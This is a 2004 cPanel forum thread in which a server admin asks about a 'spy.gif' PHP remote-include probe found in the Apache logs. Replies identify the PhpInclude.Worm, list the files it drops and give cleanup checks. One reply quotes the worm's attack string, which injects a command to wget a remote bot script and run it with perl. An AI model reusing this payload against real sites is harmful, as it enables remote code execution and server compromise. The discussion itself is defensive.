Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Worm? http://www.visualcoders.net/spy.gif?

Discussion in 'General Discussion' started by yuga, Dec 27, 2004.

  1. yuga

    yuga Active Member

    Joined:
    Jan 8, 2004
    Messages:
    27
    Likes Received:
    0
    Trophy Points:
    151
    One of my domains is getting this in the Apache logs: p=http://www.visualcoders.net/spy.gif?

    I heard it is a worm or something but could not find any reference in Google. Can anybody help me? My server is running RHES 3.0, Cpanel/WHM and PHP was already upgraded to v 4.3.10.
     
  2. mike_r

    mike_r Well-Known Member

    Joined:
    Nov 26, 2002
    Messages:
    45
    Likes Received:
    0
    Trophy Points:
    156
    "The following exploit/worm (PhpInclude.Worm) attacks any CGI it can find using Google and Yahoo and tries to cause them to include an arbitrary PHP file that is then executed becoming the sibling of the worm."

    $lista1 = 'http://server/spy.gif?&cmd=cd /tmp;wget www.server.tld/spybot.txt; perl php.txt';
    # Other filenames included with this and other variants :
    # adfkgnnodfijg
    # bot
    # bot.txt
    # bot.txt.1
    # dry.scp
    # ssh.a
    # terrorbot.txt
    # terrorbot.txt.1
    # terrorworm.txt
    # terrorworm.txt.1
    # unbot.txt
    # unbot.txt.1
    # unbot.txt.2
    # unbot.txt.3
    # unworm.txt
    # unworm.txt.1
    # unworm.txt.2
    # unworm.txt.3
    # worm1.txt
    # worm.txt
    # worm.txt.1

    So be ware of those files..
     
  3. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    532
    Likes Received:
    0
    Trophy Points:
    166
    check your /tmp | /var/tmp | /usr/local/apache/proxy for the above mentioned worm files...

    Can also do a find or locate for them in case they got put elsewhere on the filesystem.

    Also check your running processes for perl processes.
     
  4. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,574
    Likes Received:
    3
    Trophy Points:
    343
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    This technic can also be seen when a user has an unpatched phpbb forum, ensure your forums have been updated.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice